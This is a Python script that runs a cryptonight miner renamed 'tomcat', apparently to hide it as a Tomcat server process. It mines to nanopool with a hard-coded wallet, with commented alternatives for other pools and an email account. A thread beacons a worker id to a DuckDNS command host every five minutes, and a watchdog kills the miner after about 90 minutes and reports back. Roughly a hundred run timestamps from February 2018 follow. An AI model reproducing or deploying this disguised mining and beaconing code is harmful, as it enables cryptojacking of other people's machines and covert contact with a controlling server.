import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:25:08.300093
#2018-02-17 17:13:07.514809
#2018-02-17 19:01:05.355891
#2018-02-17 20:48:04.555223
#2018-02-17 22:35:03.363910
#2018-02-18 00:18:06.078626
#2018-02-18 02:09:06.369092
#2018-02-18 03:56:06.935175
#2018-02-18 05:46:04.467590
#2018-02-18 07:38:06.256443
#2018-02-18 09:25:01.364655
#2018-02-18 11:11:07.174902
#2018-02-18 12:58:02.046071
#2018-02-18 14:48:01.488107
#2018-02-18 16:35:08.777927
#2018-02-18 18:24:06.171009
#2018-02-18 20:11:01.400348
#2018-02-18 21:57:02.187262
#2018-02-18 23:46:05.627193
#2018-02-19 01:33:07.179361
#2018-02-19 03:21:06.094294
#2018-02-19 05:06:03.979684
#2018-02-19 06:51:07.324263
#2018-02-19 08:40:01.510157
#2018-02-19 10:29:01.643461
#2018-02-19 12:16:08.834799
#2018-02-19 14:05:01.304209
#2018-02-19 15:53:09.240596
#2018-02-19 17:41:04.572916
#2018-02-19 19:30:07.418489
#2018-02-19 21:19:06.621899
#2018-02-19 23:05:06.951063
#2018-02-20 00:48:05.008066
#2018-02-20 02:39:01.286889
#2018-02-20 04:27:01.632480
#2018-02-20 06:11:03.988435
#2018-02-20 07:56:03.956168
#2018-02-20 09:41:05.647219
#2018-02-20 11:25:14.355341
#2018-02-20 13:13:04.129613
#2018-02-20 14:59:01.536678
#2018-02-20 16:44:01.602638
#2018-02-20 18:33:08.150317
#2018-02-20 20:24:02.149998
#2018-02-20 22:09:04.990960
#2018-02-20 23:49:07.322842
#2018-02-21 01:34:08.029204
#2018-02-21 03:22:04.597707
#2018-02-21 05:09:01.452161
#2018-02-21 06:56:04.201920
#2018-02-21 08:42:03.985420
#2018-02-21 10:27:08.283720
#2018-02-21 12:16:07.583274
#2018-02-21 14:04:06.766675
#2018-02-21 15:49:02.088206
#2018-02-21 17:40:07.006170
#2018-02-21 19:26:06.683363
#2018-02-21 21:14:05.560399
#2018-02-21 23:01:06.920926
#2018-02-22 00:50:09.817339
#2018-02-22 02:37:04.002375
#2018-02-22 04:23:05.236197
#2018-02-22 06:10:08.705041
#2018-02-22 07:54:07.911883
#2018-02-22 09:45:03.291379
#2018-02-22 11:29:07.050569
#2018-02-22 13:16:08.919659
#2018-02-22 15:05:07.066066
#2018-02-22 16:50:16.258099
#2018-02-22 18:38:08.752412
#2018-02-22 20:29:04.462734
#2018-02-22 22:14:04.218987
#2018-02-23 00:00:05.173823
#2018-02-23 01:48:04.626731
#2018-02-23 03:36:04.154246
#2018-02-23 05:20:09.310416
#2018-02-23 07:05:05.088790
#2018-02-23 08:54:04.096578
#2018-02-23 11:12:04.251254
#2018-02-23 13:05:12.541437
#2018-02-23 14:50:03.904742
#2018-02-23 16:39:06.210538
#2018-02-23 18:27:01.722798
#2018-02-23 20:13:06.410991
#2018-02-23 22:02:07.226565
#2018-02-23 23:52:06.794764
#2018-02-24 01:43:04.167502
#2018-02-24 03:35:01.685061
#2018-02-24 05:19:01.807782
#2018-02-24 07:08:04.760191
#2018-02-24 08:54:06.520378
#2018-02-24 10:57:04.978395
#2018-02-24 12:47:04.769345
#2018-02-24 14:36:04.426947
#2018-02-24 16:22:06.314268
#2018-02-24 18:16:06.846224
#2018-02-24 20:03:04.309795
#2018-02-24 21:46:04.940801
#2018-02-25 00:45:06.061250
#2018-02-25 04:39:03.620117
#2018-02-25 08:04:06.124626